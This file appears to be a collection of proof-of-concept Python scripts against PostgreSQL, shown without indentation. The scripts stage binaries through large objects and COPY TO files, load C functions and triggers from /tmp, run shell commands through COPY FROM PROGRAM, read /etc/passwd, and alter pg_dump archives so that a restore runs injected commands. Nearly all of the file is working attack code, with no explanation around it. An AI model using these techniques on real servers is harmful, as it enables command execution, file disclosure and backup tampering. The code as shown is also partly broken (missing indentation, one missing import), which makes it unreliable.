from contextlib import closing
import psycopg2
from util import database, exec_psql
with database('db'):
exec_psql([
"""CREATE FUNCTION poc() RETURNS int as '/tmp/poc', 'pgfunc' LANGUAGE 'c' STRICT""",
"""SELECT poc()""",
],
db='db')
from base64 import b64encode
from contextlib import closing
import os
import psycopg2
import re
from sys import argv
from util import create_database, drop_database, database, exec_psql
db_name = 'db'
if len(argv) == 1:
create_database(db_name)
exec_psql(["""SELECT lo_creat(0)"""], db=db_name)
else:
loid = int(argv[1])
with open('function_poc', 'rb') as fp:
data = fp.read()
chunk_size = 2048
statements = []
for idx, chunk in enumerate(
(data[i:i + chunk_size] for i in range(0, len(data), chunk_size))):
b64 = b64encode(chunk)
statements.append(
"""INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'))"""
.format(str(loid), str(idx), b64))
from contextlib import closing
import psycopg2
from util import database, exec_psql
with database('db'):
exec_psql([
"""CREATE TABLE dump (t TEXT)""",
"""COPY dump FROM '/etc/passwd'""",
"""SELECT * from dump LIMIT 1"""
], db='db')
from base64 import b64encode
from contextlib import closing
import psycopg2
from util import database, exec_psql
with open('function_poc', 'rb') as fp:
b64 = b64encode(fp.read())
with database('db'):
exec_psql([
"""CREATE TABLE dump (t TEXT)""",
"""CREATE TABLE binaryData (b bytea)""",
"""INSERT INTO binaryData (b) values (decode('{}', 'base64'))""".format(b64),
"""COPY binaryData TO '/tmp/psql.bin' WITH BINARY""",
"""COPY dump FROM PROGRAM 'tail -c +26 /tmp/psql.bin > /tmp/poc'""",
], db='db')
from base64 import b64encode
from contextlib import closing
import psycopg2
from sys import argv
from util import create_database, drop_database, exec_psql
db_name = 'db'
if len(argv) == 1:
create_database(db_name)
exec_psql(["""SELECT lo_creat(0)"""], db=db_name)
else:
loid = int(argv[1])
with open('function_poc', 'rb') as fp:
data = fp.read()
chunk_size = 2048
statements = []
for idx, chunk in enumerate(
(data[i:i + chunk_size] for i in range(0, len(data), chunk_size))):
b64 = b64encode(chunk)
statements.append(
"""INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'))"""
.format(str(loid), str(idx), b64))
statements.append("""SELECT lo_export({}, '/tmp/lo_poc')""".format(loid))
from contextlib import closing
import psycopg2
from util import database, exec_psql
with database('db'):
exec_psql([
"""CREATE TABLE dump (t TEXT)""",
"""COPY dump FROM PROGRAM 'uname -a'""",
"""SELECT * from dump LIMIT 1"""
],
db='db')
from contextlib import closing
import psycopg2
from util import database, exec_psql
with database('db'):
exec_psql([
"""CREATE TABLE dump (t TEXT)""",
"""COPY dump FROM PROGRAM 'uname -a'""",
"""COPY dump to '/tmp/dump.txt'"""
],
db='db')
with open('/tmp/dump.txt', 'r') as fp:
print(fp.read())
from contextlib import closing
import psycopg2
from util import database, exec_psql
with database('db'):
exec_psql([
"""CREATE TABLE dump (t TEXT)""",
"""CREATE FUNCTION poc() RETURNS TRIGGER AS '/tmp/trigger_poc', 'pgtrigger' LANGUAGE 'c' STRICT""",
"""CREATE TRIGGER poc BEFORE INSERT ON dump FOR EACH ROW EXECUTE FUNCTION poc()""",
"""INSERT INTO dump (t) VALUES ('random')"""
],
db='db')
from contextlib import closing
import os
import psycopg2
import re
from util import database, exec_psql
exec_psql([
"""CREATE TABLE public.dump (t TEXT)""",
"""CREATE SEQUENCE seq START 10000000000000""",
"""SELECT nextval('seq')"""])
fname = 'copy.dump'
os.system('pg_dump -U postgres -Fc > {}'.format(fname))
with open(fname, 'rb') as fp:
data = fp.read()
repl = re.sub('(SELECT.*public.seq\x27.*;)', "COPY public.dump FROM PROGRAM 'touch /tmp/command_execution';", data)
with open(fname, 'wb') as fp:
fp.write(repl)
exec_psql([
"""DROP TABLE public.dump""",
"""DROP SEQUENCE seq"""])
from contextlib import closing
import os
import psycopg2
import re
from util import database, exec_psql
with open('function_poc', 'rb') as fp:
b64 = b64encode(fp.read())
exec_psql([
"""CREATE TABLE public.dump (t TEXT)""",
"""CREATE TABLE public.binary (b bytea)""",
"""INSERT INTO public.binary (b) values (decode('{}', 'base64'))""".format(
b64), """CREATE SEQUENCE seq START 1""", """SELECT nextval('seq')""",
"""CREATE SEQUENCE seq_b START 100000000000000000""",
"""SELECT nextval('seq_b')""",
"""CREATE SEQUENCE seq_padded_out_for_names START 10000000000000000""",
"""SELECT nextval('seq_padded_out_for_names')""",
"""CREATE SEQUENCE seq_z START 1""", """SELECT nextval('seq_z')"""
])
fname = 'bin_func.dump'
os.system('pg_dump -U postgres -Fc > {}'.format(fname))
with open(fname, 'rb') as fp:
data = fp.read()
repl = re.sub('(SELECT.*public.seq\x27.*;)',
"COPY public.binary TO '/tmp/binary' WITH BINARY;", data)
